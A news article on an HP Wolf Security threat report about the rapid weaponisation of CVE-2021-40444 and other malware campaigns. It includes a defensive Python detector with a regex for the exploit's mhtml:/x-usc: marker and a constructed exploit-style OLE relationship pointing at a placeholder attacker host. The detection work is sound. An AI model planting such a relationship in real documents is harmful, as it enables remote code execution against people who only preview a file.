Cybercriminals exploiting zero-day vulnerability before enterprises can patch

News Desk -


HP Inc. has issued its latest global HP Wolf Security Threat Insights Report, which examines real-world cyberattacks. The HP Wolf Security threat research team found evidence that cybercriminals mobilise immediately to weaponise newly disclosed zero-day vulnerabilities.

HP found exploits for the zero-day CVE-2021-40444, a remote code execution vulnerability in the MSHTML browser engine that is triggered through Microsoft Office documents, a week before Microsoft released the fix on September 14.

HP Wolf Security provides a unique view into the latest cybercriminal techniques by isolating threats that have eluded detection tools and reached user endpoints. The HP threat research team found scripts that automate building the exploit document on GitHub on September 10, just three days after the initial advisory. On unpatched systems the exploit lets attackers compromise endpoints with minimal user interaction. It uses a malicious archive file that delivers malware through an Office document. Users do not need to open the file or enable any macros; simply viewing it in File Explorer’s preview pane is enough to start the attack, and most users would not notice anything. Once a device is compromised, attackers can install backdoors, and the resulting access can be sold on to ransomware gangs.
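The document-side indicator of this exploit family is well documented: the malicious .docx carries an external OLE-object relationship whose target is an `mhtml:` URL (usually with an `!x-usc:` segment), which makes MSHTML fetch the attacker's page when the document is rendered or previewed. The script below is an added example written for this article, not HP Wolf Security's code or tooling; it unpacks a .docx (and .docx files inside a delivery archive, as the report describes) and flags that relationship. The sample documents are constructed inline and the `attacker.invalid` hostname is a placeholder, not a real indicator.

```python
# Added example: detector for the CVE-2021-40444 document indicator (not HP's code).
# Assumption: the exploit document's word/_rels/*.rels part contains an oleObject
# relationship with TargetMode="External" and an mhtml:/x-usc: target. Sample
# documents below are constructed here; attacker.invalid is a placeholder host.
import io
import re
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
# "mhtml:" at the start of the target, or an "!x-usc:" segment anywhere in it.
SUSPICIOUS_TARGET = re.compile(r"^mhtml:|!x-usc:", re.IGNORECASE)


def find_suspicious_ole_targets(docx_bytes: bytes) -> list[str]:
    """Return 'part: target' strings for external OLE relationships with mhtml/x-usc targets."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            # Relationship parts for the main document, headers, footers etc. live under word/.
            if not (part.startswith("word/") and part.endswith(".rels")):
                continue
            try:
                root = ET.fromstring(zf.read(part))
            except ET.ParseError:
                continue  # malformed rels part: not a match here, but worth logging in production
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type") == OLE_TYPE
                        and rel.get("TargetMode") == "External"
                        and SUSPICIOUS_TARGET.search(target)):
                    hits.append(f"{part}: {target}")
    return hits


def scan_archive(archive_bytes: bytes) -> dict[str, list[str]]:
    """Scan every .docx inside a ZIP archive, the delivery wrapper the report describes."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for member in zf.namelist():
            if member.lower().endswith(".docx"):
                results[member] = find_suspicious_ole_targets(zf.read(member))
    return results


# --- constructed sample documents: a minimal OOXML skeleton; only the rels part matters here ---
CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""
ROOT_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>"""
DOCUMENT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p/></w:body></w:document>"""

# Benign: an ordinary external hyperlink and an embedded (internal) OLE object.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{HYPERLINK_TYPE}" Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId2" Type="{OLE_TYPE}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""

# Exploit-style: external OLE object loaded through an mhtml:/x-usc: URL (constructed, placeholder host).
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OLE_TYPE}" TargetMode="External"
    Target="mhtml:http://attacker.invalid/page.html!x-usc:http://attacker.invalid/page.html"/>
</Relationships>"""


def build_docx(document_rels: str) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("_rels/.rels", ROOT_RELS)
        zf.writestr("word/document.xml", DOCUMENT_XML)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


def build_archive(members: dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    archive = build_archive({"invoice.docx": build_docx(MALICIOUS_RELS),
                             "readme.docx": build_docx(BENIGN_RELS)})
    for member, hits in scan_archive(archive).items():
        print(member, "SUSPICIOUS" if hits else "clean", hits)
```

This matches the marker the public exploit documents share, so a document that loads its remote content another way will not trigger it; treat it as a triage aid alongside patching and isolation of the preview and document-rendering path, not as a substitute for either. Nested archives are not unpacked.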

Other notable threats isolated by the HP Wolf Security threat insight team include:

  • Rise in cybercriminals using legitimate cloud and web providers to host malware: To evade intrusion detection systems and pass whitelisting checks, a recent GuLoader campaign hosted the Remcos Remote Access Trojan (RAT) on popular platforms such as OneDrive. HP Wolf Security also found multiple malware families hosted on gaming social media platforms such as Discord.
  • JavaScript malware slipping past detection tools: Several JavaScript RATs were delivered via malicious email attachments as part of one campaign. JavaScript downloaders have lower detection rates than Office downloaders or binaries. Attackers increasingly use RATs to steal credentials for business accounts or cryptocurrency wallets.
  • Targeted campaign found posing as the Ugandan National Social Security Fund: Attackers used “typosquatting”, a forged web address that closely resembles a legitimate domain name, to lead users to a site that downloads a malicious Word document. The document uses macros to run a PowerShell script that disables security logging and bypasses the Windows Antimalware Scan Interface (AMSI).
  • Switching to HTA files spreads malware in a single click: The Trickbot Trojan is now being distributed through HTA (HTML Application) files, which run the malware as soon as the attachment, or the archive containing it, is opened. Because HTA is an unusual file type, malicious HTA files are less likely to be flagged by detection tools.

“The average time for a business to apply, test and fully deploy patches with the proper checks is 97 days, giving cybercriminals an opportunity to exploit this window of vulnerability. While only highly capable hackers could exploit this vulnerability at first, automated scripts have lowered the bar for entry, making this type of attack accessible to less knowledgeable and resourced threat actors. This increases the risk to businesses substantially, as zero-day exploits are commoditized and made available to the mass market in venues like underground forums,” explains Alex Holland, Senior Malware Analyst, HP Wolf Security threat research team, HP Inc.

He added, “Such novel exploits tend to be effective at evading detection tools because signatures may be imperfect and become obsolete quickly as the understanding of the scope of an exploit changes. We expect threat actors to adopt CVE-2021-40444 as part of their arsenals, and potentially even replace common exploits used to gain initial access to systems today, such as those exploiting Equation Editor.”

“We are also seeing major platforms like OneDrive allowing hackers to conduct ‘flash in the pan’ attacks. While malware hosted on such platforms is generally taken down quickly, this does not deter attackers because they can often achieve their objective of delivering malware in the few hours the links are live,” Holland continues.

He further noted, “Some threat actors are changing the script or file type they are using every few months. Malicious JavaScript and HTA files are nothing new, but they are still landing in employee inboxes, putting the enterprise at risk. One campaign deployed Vengeance Justice Worm, which can spread to other systems and USB drives.”

The conclusions are based on data from millions of HP Wolf Security endpoints. HP Wolf Security tracks malware by isolating and capturing the whole infection chain in micro virtual machines (micro-VMs), helping to mitigate threats that have slipped past other security technologies. This has let customers open more than 10 billion email attachments, web pages and downloads without a reported breach. By better understanding the behaviour of malware in the wild, HP Wolf Security researchers and engineers can improve endpoint protection and overall system resilience.

Key findings in the report include:

• 12 percent of the email malware captured had bypassed at least one gateway scanner.

• Email accounted for 89 percent of the malware found, web downloads for 11 percent, and other vectors such as removable storage devices for less than 1 percent.

• Archive files (38 percent, up from 17.26 percent last quarter), Word documents (23 percent), spreadsheets (17 percent) and executables (16 percent) were the most common attachment types used to deliver malware.

• The top five most prevalent phishing lures were “order,” “payment,” “new,” “quotation,” and “request,” all of which were related to business activities.

• According to the research, 13 percent of malware captured was previously unknown.

“We can’t keep relying on detection alone. The threat landscape is too dynamic and, as we can see from the analysis of threats captured in our VMs, attackers are increasingly adept at evading detection,” comments Dr. Ian Pratt, Global Head of Security for Personal Systems, HP Inc.

He added, “Organizations must take a layered approach to endpoint security, following zero trust principles to contain and isolate the most common attack vectors like email, browsers, and downloads. This will eliminate the attack surface for whole classes of threats, while giving organizations the breathing room needed to coordinate patch cycles securely without disrupting services.”